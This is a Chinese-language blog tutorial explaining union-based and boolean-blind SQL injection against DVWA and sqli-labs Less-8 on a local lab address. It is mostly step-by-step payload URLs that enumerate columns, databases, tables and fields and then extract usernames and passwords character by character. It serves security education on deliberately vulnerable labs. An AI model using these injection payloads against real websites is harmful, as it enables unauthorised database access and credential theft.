union(联合)注入和布尔注入

最新推荐文章于 2023-08-10 16:47:30 发布
最新推荐文章于 2023-08-10 16:47:30 发布
阅读量733 收藏 4
点赞数 1
分类专栏: 小课堂 文章标签: sql注入 union联合注入 布尔注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/109611252
版权

没有很快乐,也没有不快乐,好像不该这样,但也只能这样,成长也许如此,行于奔溃边缘又慢慢自愈吧。。。

----  网易云热评

一、union联合注入

1、select 1,2,3会生成一张临时表,表中的字段为查询的字段,内容也是查询的字段

 

2、select 1,2,3 union select 3,2,1,同样生成一张临时表,表中的字段为union左边查询的字段,内容为union左右两边查询的字段!

 

3、如果不想显示左边的查询数据,只要左边的查询结果为假,就不会显示数据,比如:and 1=2或user_id=-1,这样只显示右边的查询数据!

联合查询,需要保证两表的列数相同和列的数据类型相同

 

4、判断列数:由于输入order by 3报错

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=1' order by 2 --

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=1' order by 3 -- 

5、判断显示位:显示位是1和2,可以用MySQL语句来代替获取信息!

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1' union select 1,2' -- &Submit=Submit#

 

6、获取数据库名称和版本信息

version():获取数据库版本号

database():获取数据库名称

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1' union select database(),version()' -- &Submit=Submit#

 

7、获取数据库中表的名字

获取第二个表名

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='dvwa' limit 1,1) -- &Submit=Submit#

 

8、获取所有的表名

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &Submit=Submit#

limit 0,1:第一个表名,guestbook

limit 1,1:第二个表名,users

......

limit n,1:第n个表名,......

group_concat():连接所有表名

 

9、获取user表中的字段名

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1'  union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'  -- &Submit=Submit#

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1'  union select 1,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1) -- &Submit=Submit#

 

10、获取字段的内容

http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1'  union select password,user from users limit 2,1 -- &Submit=Submit#

 

二、布尔注入

1、判断是否存在注入,输入’,报错说明存在注入

http://192.168.77.128/sqli/Less-8/?id=1

http://192.168.77.128/sqli/Less-8/?id=1' 报错,说明存在注入

 

2、判断字符注入还是数字注入

http://192.168.77.128/sqli/Less-8/?id=1 and 1=1%23

http://192.168.77.128/sqli/Less-8/?id=1 and 1=2%23 

都没有报错,说明是字符型

 

3、判断是否是存在布尔注入

http://192.168.77.128/sqli/Less-8/?id=1 and 1=1%23

http://192.168.77.128/sqli/Less-8/?id=1 and 1=2%23 

报错,说明存在布尔注入

 

4、id=1能正常显示信息,加入and语句后,只有同时满足条件才能正常显示,根据这个逻辑去确定最终的数据库长度

 

5、判断数据库名的长度

length():计算字符串长度

http://192.168.77.128/sqli/Less-8/?id=1' and length(database())=8%23 返回正常,说明该数据库名的长度为8

 

6、获取数据库名的每个字母

substr(database(),1,1):字符串的第1个字符,第一个1,起始位置,不是0开始,而是1开始;最后一个1,取字符的个数,1代表取1个字符

substr(database(),2,1):字符串的第2个字符

ascii():字符转换为对应的ASCII码值

ord() == ascii()

left:从左边开始取字符

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))=115 %23 115代表字符s

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))=101 %23 101代表字符e

http://192.168.77.128/sqli/Less-8/?id=1' and left(database(),2)='se' %23

最后确定数据的名字为security

 

7、获取表的名字

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 %23 

获取第一个表的第一个字符e

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109 %23 

获取第一个表的第二个字符m

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114 %23 

获取第二个表的第一个字符r

http://192.168.77.128/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101 %23 

获取第二个表的第二个字符e

 

8、获取user表的字段

http://192.168.77.128/sqli/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^use' limit 0,1) %23 是否存在use开头的列

http://192.168.77.128/sqli/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1) %23 是否存在username开头的列

同样可以判断出password的列名

 

9、获取字段的内容

cast(username as char)将username转换成char类型,注意这里是cast函数(语法:cast(字段名 as 转换的类型 ))

ifnull(expr1,expr2)函数的语法为如果 expr1 不是null,ifnull() 返回 expr1,否则它返回 expr2。

0x20是空格的ascii码的十六进制表示。

mid()函数截取字符串一部分,mid(str,start,length)从位置start开始,截取str字符串的length位。

ord()函数同ascii(),将字符转为ascii值。

http://192.168.77.128/sqli/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68 %23  

获取username字段的第一个数据的第一个字符

http://192.168.77.128/sqli/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),2,1))=117 %23 

获取username字段的第一个数据的第一个字符

http://192.168.77.128/sqli/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 1,1),1,1))=65 %23 

获取username字段的第二个数据的第一个字符

http://192.168.77.128/sqli/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 1,1),2,1))=110 %23  

获取username字段的第二个数据的第二个字符

Angelina

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
最新发布
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。 超级SQL注入工具支持盲注环境获取世界各国语言数据,解决了各种常见注入工具在盲注环境下无法支持中文等多字节编码的数据。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
SQL学习笔记六 union联合结果集使用
09-11
SQL学习笔记六 union联合结果集使用,需要的朋友可以参考下。
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
SQL注入union联合注入
hobby云说
06-12 3523
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
sql注入中的联合注入
..
12-06 5926
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
渗透测试-SQL注入union联合注入和报错注入
lza20001103的博客
04-18 2596
渗透测试-SQL注入union联合注入和报错注入
Mysql注入union联合注入、报错注入布尔盲注、时间盲注
Thunderclap的博客
11-14 4917
Union联合注入 union联合注入第一步 判断是否存在注入,判断注入点类型 1 and 1=1-- (整型) 1 and 1=2-- (整型) 1’ or ‘1’='1 (字符型) 1’ or ‘1’ = '2 (字符型) 表示:如果用户可控的传值位置不在末尾,那么#以后的sql语句会注释掉,不进行编译 and 表示:and两边都为真时,那么结果为真,返回正确结果,反之返回false or表示:or两边只要有一边为真,那么结果为真,返回正确结果,反之返回false 获取数据库中信息:判断列数 1
SQL注入union 联合注入
weixin_53711701的博客
01-16 4178
SQL注入union联合注入
联合注入
qq_35191331的博客
08-16 953
题目连接:http://103.238.227.13:10087/ //过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','li
union联合注入
m0_60945802的博客
03-21 4885
union联合注入
SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第二十六关,SQLi-LABS Less-26,SQLi-LABS Less 26,SQLiLABS Less26,SQLi Less 26
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3125
SQL注入联合查询注入与报错注入
sql注入-union注入union函数 联合注入
07-11 7187
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
Mysql注入之一 联合注入
笨蛋9的博客
02-17 3172
一 前言作者也在学习web安全,可能文章中或多或少存在一些错误内容。写些手工注入的文章,一方面能加深对这部分知识的印象,一方面也能大家互相学习。 有人可能问:数据库注入不是有很多非常强大的工具,如sqlmap,为什么还要去花些时间去学习手工注入。虽然使用sqlmap等注入工具能很轻松的对拖一个存在注入漏洞无安全狗的网站的数据库,但却无法知道注入的全过程,不方便后续写一些自动化测试的脚本,同时由于是
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 442
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
sql注入——布尔注入
Night_time的博客
05-04 5004
以sqli-labs-master 闯关游戏第八关为例: 第一步:判断注入点 ?id=1' and 1=2-- - //页面显示异常 ?id=1' and 1=1-- - //页面正常显示 第二步:判断是什么类型的注入点 构建报错语句: ?id=1' and updatexml(1,0x7e,1)-- - 页面无显示,那就不是报错注入: 那就判断是不是布尔注入,首...
sql注入union盲注
07-28
回答: SQL注入的盲注可以分为三类:布尔盲注、延时盲注和报错盲注。其中,布尔盲注是一种通过构造逻辑表达式的SQL语句来判断数据的具体内容的盲注方式。在布尔盲注中,页面在执行SQL语句后,只显示两种结果,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值